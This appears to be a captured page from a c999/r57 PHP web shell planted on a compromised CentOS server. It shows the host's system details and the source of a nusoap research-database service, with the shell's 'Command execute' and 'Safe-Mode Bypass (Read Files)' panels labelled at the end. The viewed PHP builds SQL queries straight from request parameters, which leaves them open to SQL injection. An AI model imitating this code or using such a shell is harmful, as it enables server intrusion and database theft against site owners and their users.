Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/nusoap/ drwxr-xr-x | |
| Viewing file: Select action/file-type: register('test'); $server->register('getResearchID'); $server->register('getResearchTB'); $server->register('getResearchCharTB'); $server->register('getResearchFileTB'); $server->register('getResearchPublicTB'); $server->register('getResearchSuccessTB'); //Define the method as a PHP function function test(){ $txt = "Hello World"; return $txt; } function getResearchID($tableName){ include_once "../include/Config.php"; include_once "class/clsConnection.php"; include_once "class/clsDB.php"; $hostname = $ServerName; $dbname = $DataBaseName; $username = $UserName; $password = $UserPassword; $conn = new clsConnection("$hostname","$dbname","$username","$password"); $sql = "select * from $tableName"; $result = mysql_query($sql); $row = mysql_num_rows($result); switch($tableName){ case "research_tb" : for($i=0;$i<$row;$i++){ $researchID = $i == 0 ? mysql_result($result,$i,"Research_code") : $researchID.",".mysql_result($result,$i,"Research_code"); } break; case "research_char_tb" : for($i=0;$i<$row;$i++){ $researchID = $i == 0 ? mysql_result($result,$i,"RecharId") : $researchID.",".mysql_result($result,$i,"RecharId"); } break; case "research_file_tb" : for($i=0;$i<$row;$i++){ $researchID = $i == 0 ? mysql_result($result,$i,"Research_Id") : $researchID.",".mysql_result($result,$i,"Research_Id"); } break; case "research_public_tb" : for($i=0;$i<$row;$i++){ $researchID = $i == 0 ? mysql_result($result,$i,"RepbCo") : $researchID.",".mysql_result($result,$i,"RepbCo"); } break; case "research_success_tb" : for($i=0;$i<$row;$i++){ $researchID = $i == 0 ? mysql_result($result,$i,"ResuccessId") : $researchID.",".mysql_result($result,$i,"ResuccessId"); } break; } return $researchID; } function getResearchTB($researchCode){ include_once "../include/Config.php"; include_once "class/clsConnection.php"; include_once "class/clsDB.php"; $hostname = $ServerName; $dbname = $DataBaseName; $username = $UserName; $password = $UserPassword; $conn = new clsConnection("$hostname","$dbname","$username","$password"); $sql = "select * from research_tb where Research_code = '$researchCode' limit 1"; $result = mysql_query($sql); $data[0] = base64_encode(mysql_result($result,0,0)); $data[1] = base64_encode(mysql_result($result,0,1)); $data[2] = base64_encode(mysql_result($result,0,2)); $data[3] = base64_encode(mysql_result($result,0,3)); $data[4] = base64_encode(mysql_result($result,0,4)); $data[5] = base64_encode(mysql_result($result,0,5)); $data[6] = base64_encode(mysql_result($result,0,6)); $data[7] = base64_encode(mysql_result($result,0,7)); $data[8] = base64_encode(mysql_result($result,0,8)); $data[9] = base64_encode(mysql_result($result,0,9)); $data[10] = base64_encode(mysql_result($result,0,10)); $data[11] = base64_encode(mysql_result($result,0,11)); $data[12] = base64_encode(mysql_result($result,0,12)); $data[13] = base64_encode(mysql_result($result,0,13)); $data[14] = base64_encode(mysql_result($result,0,14)); $data[15] = base64_encode(mysql_result($result,0,15)); $data[16] = base64_encode(mysql_result($result,0,16)); $data[17] = base64_encode(mysql_result($result,0,17)); $data[18] = base64_encode(mysql_result($result,0,18)); $data[19] = base64_encode(mysql_result($result,0,19)); $data[20] = base64_encode(mysql_result($result,0,20)); $data[21] = base64_encode(mysql_result($result,0,21)); $data[22] = base64_encode(mysql_result($result,0,22)); $data[23] = base64_encode(mysql_result($result,0,23)); $data[24] = base64_encode(mysql_result($result,0,24)); $data[25] = base64_encode(mysql_result($result,0,25)); $data[26] = base64_encode(mysql_result($result,0,26)); $data[27] = base64_encode(mysql_result($result,0,27)); $data[28] = base64_encode(mysql_result($result,0,28)); $data[29] = base64_encode(mysql_result($result,0,29)); $data[30] = base64_encode(mysql_result($result,0,30)); $data[31] = base64_encode(mysql_result($result,0,31)); $data[32] = base64_encode(mysql_result($result,0,32)); $data[33] = base64_encode(mysql_result($result,0,33)); $data[34] = base64_encode(mysql_result($result,0,34)); $conn->Disconnect(); return $data; } function getResearchCharTB($researchCode){ include_once "../include/Config.php"; include_once "class/clsConnection.php"; include_once "class/clsDB.php"; $hostname = $ServerName; $dbname = $DataBaseName; $username = $UserName; $password = $UserPassword; $conn = new clsConnection("$hostname","$dbname","$username","$password"); $sql = "select * from research_char_tb where RecharId = '$researchCode' limit 1"; $result = mysql_query($sql); $data[0] = base64_encode(mysql_result($result,0,0)); $data[1] = base64_encode(mysql_result($result,0,1)); $data[2] = base64_encode(mysql_result($result,0,2)); $data[3] = base64_encode(mysql_result($result,0,3)); $data[4] = base64_encode(mysql_result($result,0,4)); $data[5] = base64_encode(mysql_result($result,0,5)); $data[6] = base64_encode(mysql_result($result,0,6)); $conn->Disconnect(); return $data; } function getResearchFileTB($researchCode){ include_once "../include/Config.php"; include_once "class/clsConnection.php"; include_once "class/clsDB.php"; $hostname = $ServerName; $dbname = $DataBaseName; $username = $UserName; $password = $UserPassword; $conn = new clsConnection("$hostname","$dbname","$username","$password"); $sql = "select * from research_file_tb where Research_Id = '$researchCode' limit 1"; $result = mysql_query($sql); $data[0] = base64_encode(mysql_result($result,0,0)); $data[1] = base64_encode(mysql_result($result,0,1)); $data[2] = base64_encode(mysql_result($result,0,2)); $data[3] = base64_encode(mysql_result($result,0,3)); $data[4] = base64_encode(mysql_result($result,0,4)); $data[5] = base64_encode(mysql_result($result,0,5)); $data[6] = base64_encode(mysql_result($result,0,6)); $data[7] = base64_encode(mysql_result($result,0,7)); $data[8] = base64_encode(mysql_result($result,0,8)); $data[9] = base64_encode(mysql_result($result,0,9)); $data[10] = base64_encode(mysql_result($result,0,10)); $data[11] = base64_encode(mysql_result($result,0,11)); $conn->Disconnect(); return $data; } function getResearchPublicTB($researchCode){ include_once "../include/Config.php"; include_once "class/clsConnection.php"; include_once "class/clsDB.php"; $hostname = $ServerName; $dbname = $DataBaseName; $username = $UserName; $password = $UserPassword; $conn = new clsConnection("$hostname","$dbname","$username","$password"); $sql = "select * from research_public_tb where RepbCo = '$researchCode' limit 1"; $result = mysql_query($sql); $data[0] = base64_encode(mysql_result($result,0,0)); $data[1] = base64_encode(mysql_result($result,0,1)); $data[2] = base64_encode(mysql_result($result,0,2)); $data[3] = base64_encode(mysql_result($result,0,3)); $data[4] = base64_encode(mysql_result($result,0,4)); $data[5] = base64_encode(mysql_result($result,0,5)); $data[6] = base64_encode(mysql_result($result,0,6)); $data[7] = base64_encode(mysql_result($result,0,7)); $data[8] = base64_encode(mysql_result($result,0,8)); $data[9] = base64_encode(mysql_result($result,0,9)); $data[10] = base64_encode(mysql_result($result,0,10)); $data[11] = base64_encode(mysql_result($result,0,11)); $data[12] = base64_encode(mysql_result($result,0,12)); $data[13] = base64_encode(mysql_result($result,0,13)); $data[14] = base64_encode(mysql_result($result,0,14)); $data[15] = base64_encode(mysql_result($result,0,15)); $data[16] = base64_encode(mysql_result($result,0,16)); $data[17] = base64_encode(mysql_result($result,0,17)); $data[18] = base64_encode(mysql_result($result,0,18)); $data[19] = base64_encode(mysql_result($result,0,19)); $data[20] = base64_encode(mysql_result($result,0,20)); $data[21] = base64_encode(mysql_result($result,0,21)); $data[22] = base64_encode(mysql_result($result,0,22)); $data[23] = base64_encode(mysql_result($result,0,23)); $data[24] = base64_encode(mysql_result($result,0,24)); $data[25] = base64_encode(mysql_result($result,0,25)); $data[26] = base64_encode(mysql_result($result,0,26)); $data[27] = base64_encode(mysql_result($result,0,27)); $data[28] = base64_encode(mysql_result($result,0,28)); $data[29] = base64_encode(mysql_result($result,0,29)); $data[30] = base64_encode(mysql_result($result,0,30)); $data[31] = base64_encode(mysql_result($result,0,31)); $data[32] = base64_encode(mysql_result($result,0,32)); $data[33] = base64_encode(mysql_result($result,0,33)); $conn->Disconnect(); return $data; } function getResearchSuccessTB($researchCode){ include_once "../include/Config.php"; include_once "class/clsConnection.php"; include_once "class/clsDB.php"; $hostname = $ServerName; $dbname = $DataBaseName; $username = $UserName; $password = $UserPassword; $conn = new clsConnection("$hostname","$dbname","$username","$password"); $sql = "select * from research_success_tb where ResuccessId = '$researchCode' limit 1"; $result = mysql_query($sql); $data[0] = base64_encode(mysql_result($result,0,0)); $data[1] = base64_encode(mysql_result($result,0,1)); $data[2] = base64_encode(mysql_result($result,0,2)); $data[3] = base64_encode(mysql_result($result,0,3)); $data[4] = base64_encode(mysql_result($result,0,4)); $data[5] = base64_encode(mysql_result($result,0,5)); $conn->Disconnect(); return $data; } //Use the request to (try to) invoke the service $HTTP_RAW_POST_DATA = isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : ''; $server->service($HTTP_RAW_POST_DATA); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]-- |